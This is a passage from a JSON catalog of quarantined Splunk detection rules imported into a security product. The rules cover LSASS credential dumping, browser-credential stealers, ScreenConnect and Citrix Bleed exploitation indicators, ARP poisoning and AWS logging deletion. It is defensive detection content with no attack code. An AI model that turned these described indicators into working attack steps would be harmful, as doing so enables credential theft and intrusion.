Immediate investigation is required to mitigate risks and prevent further unauthorized actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-new-local-admin-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b25f6f62-0712-43c1-b203-083231ffd97d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_new_local_admin_account.yml" } }, { "id": "splunk-security-content-b25f6f62-0782-43c1-b403-083231ffd97d", "type": "detection", "name": "Short Lived Windows Accounts", "description": "The following analytic detects the rapid creation and deletion of Windows accounts within a short time frame of 1 hour. It leverages the \"Change\" data model in Splunk, specifically monitoring events with result IDs 4720 (account creation) and 4726 (account deletion). This behavior is significant as it may indicate an attacker attempting to create and remove accounts quickly to evade detection or gain unauthorized access. If confirmed malicious, this activity could lead to unauthorized access, privilege escalation, or further malicious actions within the environment. 
Immediate investigation of flagged events is crucial to mitigate potential damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.003", "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/short-lived-windows-accounts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b25f6f62-0782-43c1-b403-083231ffd97d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/short_lived_windows_accounts.yml" } }, { "id": "splunk-security-content-b27685a2-8826-4123-ab78-2d9d0d419ed0", "type": "detection", "name": "GitHub Enterprise Register Self Hosted Runner", "description": "The following analytic identifies when a self-hosted runner is created in GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for actions related to creating new self-hosted runners at the organization or enterprise level. This behavior warrants monitoring because self-hosted runners execute workflow jobs on customer-controlled infrastructure, which could be exploited by attackers to execute malicious code, access sensitive data, or pivot to other systems. While self-hosted runners are a legitimate feature, their creation should be carefully controlled as compromised runners pose significant security risks. The impact includes potential remote code execution, data exfiltration, and lateral movement within the environment if a runner is compromised. 
SOC teams should investigate unexpected runner creation events to verify they are authorized and properly secured, especially if created by unfamiliar users or in unusual contexts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-register-self-hosted-runner.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b27685a2-8826-4123-ab78-2d9d0d419ed0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_register_self_hosted_runner.yml" } }, { "id": "splunk-security-content-b27f20bd-ef20-41d1-a1e9-25dedd5bf2f5", "type": "detection", "name": "Windows Modify Registry ProxyEnable", "description": "The following analytic detects modifications to the Windows registry key \"ProxyEnable\" to enable proxy settings. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes to the \"Internet Settings\\ProxyEnable\" registry path. This activity is significant as it is commonly exploited by malware and adversaries to establish proxy communication, potentially connecting to malicious Command and Control (C2) servers. 
If confirmed malicious, this could allow attackers to redirect network traffic through a proxy, facilitating unauthorized communication and data exfiltration, thereby compromising the security of the affected host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-proxyenable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b27f20bd-ef20-41d1-a1e9-25dedd5bf2f5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_proxyenable.yml" } }, { "id": "splunk-security-content-b28c4957-96a6-47e0-a965-6c767aac1458", "type": "detection", "name": "AWS Defense Evasion Impair Security Services", "description": "The following analytic detects attempts to impair or disable AWS security services by monitoring specific deletion operations across GuardDuty, AWS WAF (classic and v2), CloudWatch, Route 53, and CloudWatch Logs. These actions include deleting detectors, rule groups, IP sets, web ACLs, logging configurations, alarms, and log streams. Adversaries may perform such operations to evade detection or remove visibility from defenders. By explicitly pairing eventName values with their corresponding eventSource services, this detection reduces noise and ensures that only security-related deletions are flagged. 
It leverages CloudTrail logs to identify specific API calls like \"DeleteLogStream\" and \"DeleteDetector.\" This activity is significant because it indicates potential efforts to disable security monitoring and evade detection. If confirmed malicious, this could allow attackers to operate undetected, escalate privileges, or exfiltrate data without triggering security alerts, severely compromising the security posture of the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-defense-evasion-impair-security-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b28c4957-96a6-47e0-a965-6c767aac1458", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_defense_evasion_impair_security_services.yml" } }, { "id": "splunk-security-content-b2c81cc6-6040-11eb-ae93-0242ac130002", "type": "detection", "name": "O365 Add App Role Assignment Grant User", "description": "The following analytic detects the addition of an application role assignment grant to a user in Office 365. It leverages data from the `o365_management_activity` dataset, specifically monitoring the \"Add app role assignment grant to user\" operation. This activity is significant as it can indicate unauthorized privilege escalation or the assignment of sensitive roles to users. 
If confirmed malicious, this could allow an attacker to gain elevated permissions, potentially leading to unauthorized access to critical resources and data within the Office 365 environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-add-app-role-assignment-grant-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b2c81cc6-6040-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_add_app_role_assignment_grant_user.yml" } }, { "id": "splunk-security-content-b2cc69e7-11ba-42dc-a269-59c069a48870", "type": "detection", "name": "Windows System Time Discovery W32tm Delay", "description": "The following analytic identifies the use of the w32tm.exe utility with the /stripchart function, which is indicative of DCRat malware delaying its payload execution. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line arguments used by w32tm.exe. This activity is significant as it may indicate an attempt to evade detection by delaying malicious actions such as C2 communication and beaconing. 
If confirmed malicious, this behavior could allow an attacker to maintain persistence and execute further malicious activities undetected.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1124" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-time-discovery-w32tm-delay.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b2cc69e7-11ba-42dc-a269-59c069a48870", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_time_discovery_w32tm_delay.yml" } }, { "id": "splunk-security-content-b2ea1f38-3a3e-4b8a-9cf1-82760d86a6b8", "type": "detection", "name": "Monitor Email For Brand Abuse", "description": "The following analytic identifies emails claiming to be sent from a domain similar to one you are monitoring for potential abuse. It leverages email header data, specifically the sender's address, and cross-references it with a lookup table of known domain permutations generated by the \"ESCU - DNSTwist Domain Names\" search. This activity is significant as it can indicate phishing attempts or brand impersonation, which are common tactics used in social engineering attacks. 
If confirmed malicious, this could lead to unauthorized access, data theft, or reputational damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/monitor-email-for-brand-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b2ea1f38-3a3e-4b8a-9cf1-82760d86a6b8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/monitor_email_for_brand_abuse.yml" } }, { "id": "splunk-security-content-b2fb6830-9ed1-11ec-9fcb-acde48001122", "type": "detection", "name": "Windows Disable LogOff Button Through Registry", "description": "The following analytic detects a suspicious registry modification that disables the logoff feature on a Windows host. It leverages data from the Endpoint.Registry data model to identify changes to specific registry values associated with logoff functionality. This activity is significant because it can indicate ransomware attempting to make the compromised host unusable and hinder remediation efforts. 
If confirmed malicious, this action could prevent users from logging off, complicate incident response, and allow attackers to maintain persistence and control over the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-logoff-button-through-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b2fb6830-9ed1-11ec-9fcb-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_logoff_button_through_registry.yml" } }, { "id": "splunk-security-content-b2fbe95a-9c62-4c12-8a29-24b97e84c0cd", "type": "detection", "name": "Creation of lsass Dump with Taskmgr", "description": "The following analytic detects the creation of an lsass.exe process dump using Windows Task Manager. It leverages Sysmon EventID 11 to identify file creation events where the target filename matches *lsass*.dmp. This activity is significant because creating an lsass dump can be a precursor to credential theft, as the dump file contains sensitive information such as user passwords. 
If confirmed malicious, an attacker could use the lsass dump to extract credentials and escalate privileges, potentially compromising the entire network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/creation-of-lsass-dump-with-taskmgr.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b2fbe95a-9c62-4c12-8a29-24b97e84c0cd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/creation_of_lsass_dump_with_taskmgr.yml" } }, { "id": "splunk-security-content-b3424bbe-3204-4469-887b-ec144483a336", "type": "detection", "name": "ASL AWS Concurrent Sessions From Different Ips", "description": "The following analytic identifies an AWS IAM account with concurrent sessions originating from more than one unique IP address within a 5-minute span. This detection leverages AWS CloudTrail logs, specifically the `DescribeEventAggregates` API call, to identify multiple IP addresses associated with the same user session. This behavior is significant as it may indicate a session hijacking attack, where an adversary uses stolen session cookies to access AWS resources from a different location. 
If confirmed malicious, this activity could allow unauthorized access to sensitive corporate resources, leading to potential data breaches or further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1185" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-concurrent-sessions-from-different-ips.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b3424bbe-3204-4469-887b-ec144483a336", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_concurrent_sessions_from_different_ips.yml" } }, { "id": "splunk-security-content-b34bcf35-5380-4b00-b208-5531303fb751", "type": "detection", "name": "Windows Hosts File Access", "description": "This Analytic detects the execution of a process attempting to access the hosts file.\nThe hosts file is a critical file for network configuration and DNS resolution.\nIf an attacker gains access to it, they can redirect traffic to malicious websites, serve fake content or block legitimate security websites.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-hosts-file-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"splunk/security_content", "source_id": "b34bcf35-5380-4b00-b208-5531303fb751", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_hosts_file_access.yml" } }, { "id": "splunk-security-content-b3632472-310b-11ec-9aab-acde48001122", "type": "detection", "name": "WinEvent Windows Task Scheduler Event Action Started", "description": "The following analytic detects the execution of tasks registered in Windows Task Scheduler by monitoring EventID 200 (action run) and 201 (action completed) from the Task Scheduler logs. This detection leverages Task Scheduler logs to identify potentially suspicious or unauthorized task executions. Monitoring these events is significant for a SOC as it helps uncover evasive techniques used for persistence, unauthorized code execution, or other malicious activities. If confirmed malicious, this activity could lead to unauthorized access, data exfiltration, or the execution of harmful payloads, posing a significant threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/winevent-windows-task-scheduler-event-action-started.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b3632472-310b-11ec-9aab-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"detections/endpoint/winevent_windows_task_scheduler_event_action_started.yml" } }, { "id": "splunk-security-content-b36b23ea-763c-417b-bd4a-6a378dabad1a", "type": "detection", "name": "Windows Credentials from Web Browsers Saved in TEMP Folder", "description": "The following analytic detects the creation of files containing passwords, cookies, and saved login account information by the Braodo stealer malware in temporary folders. Braodo often collects these credentials from browsers and applications, storing them in temp directories before exfiltration. This detection focuses on monitoring for the creation of files with patterns or formats commonly associated with stolen credentials. By identifying these activities, security teams can take needed action to prevent sensitive login data from being leaked, reducing the risk of unauthorized access to user accounts and systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credentials-from-web-browsers-saved-in-temp-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b36b23ea-763c-417b-bd4a-6a378dabad1a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credentials_from_web_browsers_saved_in_temp_folder.yml" } }, { "id": "splunk-security-content-b38932ad-e663-4e90-bfdf-8446ee5b3f34", "type": "detection", "name": "Cisco Duo Admin Login Unusual Browser", "description": "The following analytic identifies instances where a Duo 
admin logs in using a browser other than Chrome, which is considered unusual based on typical access patterns. Please adjust as needed to your environment. The detection leverages Duo activity logs ingested via the Cisco Security Cloud App and filters for admin login actions where the browser is not Chrome. By renaming and aggregating relevant fields such as user, browser, IP address, and location, the analytic highlights potentially suspicious access attempts that deviate from the norm. This behavior is significant for a SOC because the use of an unexpected browser may indicate credential compromise, session hijacking, or the use of unauthorized devices by attackers attempting to evade detection. Detecting such anomalies enables early investigation and response, helping to prevent privilege escalation, policy manipulation, or further compromise of sensitive administrative accounts. The impact of this attack could include unauthorized changes to security policies, user access, or the disabling of critical security controls, posing a substantial risk to the organization's security posture.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-admin-login-unusual-browser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b38932ad-e663-4e90-bfdf-8446ee5b3f34", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_admin_login_unusual_browser.yml" } }, { "id": 
"splunk-security-content-b3b7ce35-fce5-4c73-85f4-700aeada81a9", "type": "detection", "name": "Windows Credential Dumping LSASS Memory Createdump", "description": "The following analytic detects the use of CreateDump.exe to perform a process dump. This binary is not native to Windows and is often introduced by third-party applications, including PowerShell 7. The detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, GUIDs, and complete command-line executions. This activity is significant as it may indicate an attempt to dump LSASS memory, which can be used to extract credentials. If confirmed malicious, this could lead to unauthorized access and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credential-dumping-lsass-memory-createdump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b3b7ce35-fce5-4c73-85f4-700aeada81a9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credential_dumping_lsass_memory_createdump.yml" } }, { "id": "splunk-security-content-b3f7a803-e802-448b-8eb2-e796b223bccc", "type": "detection", "name": "Nginx ConnectWise ScreenConnect Authentication Bypass", "description": "The following analytic detects attempts to exploit the ConnectWise ScreenConnect CVE-2024-1709 vulnerability, which allows attackers to bypass authentication via alternate paths or channels. 
It leverages Nginx access logs to identify web requests to the SetupWizard.aspx page, indicating potential exploitation. This activity is significant as it can lead to unauthorized administrative access and remote code execution. If confirmed malicious, attackers could create administrative users and gain full control over the affected ScreenConnect instance, posing severe security risks. Immediate remediation by updating to version 23.9.8 or above is recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/nginx-connectwise-screenconnect-authentication-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b3f7a803-e802-448b-8eb2-e796b223bccc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/nginx_connectwise_screenconnect_authentication_bypass.yml" } }, { "id": "splunk-security-content-b44bebd6-bd39-467b-9321-73971bcd1aac", "type": "detection", "name": "Detect ARP Poisoning", "description": "The following analytic detects ARP Poisoning attacks by monitoring for Dynamic ARP Inspection (DAI) errors on Cisco network devices. It leverages logs from Cisco devices, specifically looking for events where the ARP inspection feature has disabled an interface due to suspicious activity. This activity is significant because ARP Poisoning can allow attackers to intercept, modify, or disrupt network traffic, leading to potential data breaches or denial of service. 
If confirmed malicious, this could enable attackers to perform man-in-the-middle attacks, compromising the integrity and confidentiality of network communications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1200", "T1498", "T1557.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-arp-poisoning.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b44bebd6-bd39-467b-9321-73971bcd1aac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_arp_poisoning.yml" } }, { "id": "splunk-security-content-b44f6ac6-0429-11ec-87e9-acde48001122", "type": "detection", "name": "GetWmiObject User Account with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with command-line arguments that utilize the `Get-WmiObject` cmdlet and the `Win32_UserAccount` parameter to query local user accounts. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it may indicate an attempt by adversaries to enumerate user accounts for situational awareness or Active Directory discovery. 
If confirmed malicious, this behavior could lead to further reconnaissance, privilege escalation, or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getwmiobject-user-account-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b44f6ac6-0429-11ec-87e9-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getwmiobject_user_account_with_powershell.yml" } }, { "id": "splunk-security-content-b483804a-4cc0-49a4-9f00-ac29ba844d08", "type": "detection", "name": "Windows Process Executed From Removable Media", "description": "This analytic is used to identify when a removable media device is attached to a machine and then a process is executed from the same drive letter assigned to the removable media device. 
Adversaries and Insider Threats may use removable media devices for several malicious activities, including initial access, execution, and exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1200", "T1025", "T1091" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-executed-from-removable-media.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b483804a-4cc0-49a4-9f00-ac29ba844d08", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_executed_from_removable_media.yml" } }, { "id": "splunk-security-content-b49b6ef4-57cd-4d42-bd7e-64e00f11cc87", "type": "detection", "name": "Crowdstrike User Weak Password Policy", "description": "The following analytic detects CrowdStrike alerts for weak password policy violations, identifying instances where passwords do not meet the required security standards. These alerts highlight potential vulnerabilities that could be exploited by attackers, emphasizing the need for stronger password practices. 
Addressing these alerts promptly helps to enhance overall security and protect sensitive information from unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crowdstrike-user-weak-password-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b49b6ef4-57cd-4d42-bd7e-64e00f11cc87", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/crowdstrike_user_weak_password_policy.yml" } }, { "id": "splunk-security-content-b4d4217a-6673-4fb6-837d-07a522bdf9f7", "type": "detection", "name": "ESXi System Information Discovery", "description": "This detection identifies the use of ESXCLI system-level commands that retrieve configuration details. 
While used for legitimate administration, this behavior may also indicate adversary reconnaissance aimed at profiling the ESXi host's capabilities, build information, or system role in preparation for further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-system-information-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b4d4217a-6673-4fb6-837d-07a522bdf9f7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_system_information_discovery.yml" } }, { "id": "splunk-security-content-b509bbd3-0331-4aaa-8e4a-d2affe100af6", "type": "detection", "name": "Linux Deletion Of Services", "description": "The following analytic detects the deletion of services on a Linux machine. It leverages filesystem event logs to identify when service files within system directories (e.g., /etc/systemd/, /lib/systemd/, /run/systemd/) are deleted. This activity is significant because attackers may delete or modify services to disable security features or evade defenses. If confirmed malicious, this behavior could indicate an attempt to impair system functionality or execute a destructive payload, potentially leading to system instability or data loss. 
Immediate investigation is required to determine the responsible process and user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-deletion-of-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b509bbd3-0331-4aaa-8e4a-d2affe100af6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_deletion_of_services.yml" } }, { "id": "splunk-security-content-b5541828-8ffd-4070-9d95-b3da4de924cb", "type": "detection", "name": "Suspicious writes to windows Recycle Bin", "description": "The following analytic detects when a process other than explorer.exe writes to the Windows Recycle Bin. It leverages the Endpoint.Filesystem and Endpoint.Processes data models in Splunk to identify any process writing to the \"*$Recycle.Bin*\" file path, excluding explorer.exe. This activity is significant because it may indicate an attacker attempting to hide their actions, potentially leading to data theft, ransomware, or other malicious outcomes. 
If confirmed malicious, this behavior could allow an attacker to persist in the environment and evade detection by security tools.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-writes-to-windows-recycle-bin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b5541828-8ffd-4070-9d95-b3da4de924cb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_writes_to_windows_recycle_bin.yml" } }, { "id": "splunk-security-content-b593cac5-dd20-4358-972a-d945fefdaf17", "type": "detection", "name": "Citrix ADC and Gateway Unauthorized Data Disclosure", "description": "The following analytic detects attempts to exploit the Citrix Bleed vulnerability (CVE-2023-4966), which can lead to the leaking of session tokens. It identifies HTTP requests with a 200 status code targeting the /oauth/idp/.well-known/openid-configuration URL endpoint. By parsing web traffic and filtering based on user agent details, HTTP method, source and destination IPs, and sourcetype, it aims to identify potentially 